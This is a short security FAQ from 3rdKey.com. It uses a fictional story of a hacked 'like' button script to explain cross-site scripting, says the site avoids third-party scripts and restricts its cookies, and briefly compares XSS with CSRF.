Log In / Register
What is a Cross Site Scripting attack? and how does 3rdKey block it?

In short, Cross-Site Scripting (XSS) is the idea of using a script from one server to read or manipulate something on another server.

A web site, TLC.org.za (a worthy orphanage in South Africa), wants to be better known, so it puts a chatter.com like button on its pages.

Dave, a true philanthropist, makes a donation using moneyFriend.com, then clicks the the chatter like button to let his friends know about this worthy cause.

chatter.com runs a script which has Dave "like" and "follow" TLC.org.za, and then tells all of Dave's chatter friends about it.

Good for Dave, good for TLC.org.za, good for chatter.com, everybody's happy

As long as chatter.com is highly moral and ethical and is never hacked. (Have any companies like chatter.com ever been breached? Here's a list of breaches at facebook and here's a list of breaches at twitter

When the chatter.com script runs it can access the cookies and web storage used by TLC.org.za

So if chatter.com is not highly moral and ethical, or if its been hacked, then it can "steal" Dave's moneyFriend.com connection.

But if chatter.com was recently hacked by scumBag.net, and a "virus" script was added to the like function, when Dave clicked "like", his moneyFriend.com details were sent to scumBag.net, and scumBag.net has just sent $1000 of Dave's hard-earned cash to a bank account in Mauritius

The above scenario is purely fictitious, although things like that happen many times every day.

TLC.org.za, is a real orphanage in South Africa, that does wonderful things every day, with very little money

But how does a site like 3rdKey.com prevent this kind of thing from happening?

Any site that understands this problem, including 3rdKey.com, configures their cookies so they can not be accessed by different sites

But additionally, we do not trust any other site, we will not put any script from any other site on any of our pages, ever. that is why you do not find the "like" button on our pages.


[ FAQs]

Explain Cross-Site Request Forgery (CSRF), and how 3rdKey.com prevents it.

This can be confused with Cross-Site Scripting, the effect is about the same, but the method is quite different.

In XSS the scumBag.net virus site has stolen Dave's log in by reading goodSite.com's cookies, in CSRF scumBag.net "guesses" that Dave is logged in to goodSite.com, and sends it instructions.


 
Home Log In Register FAQ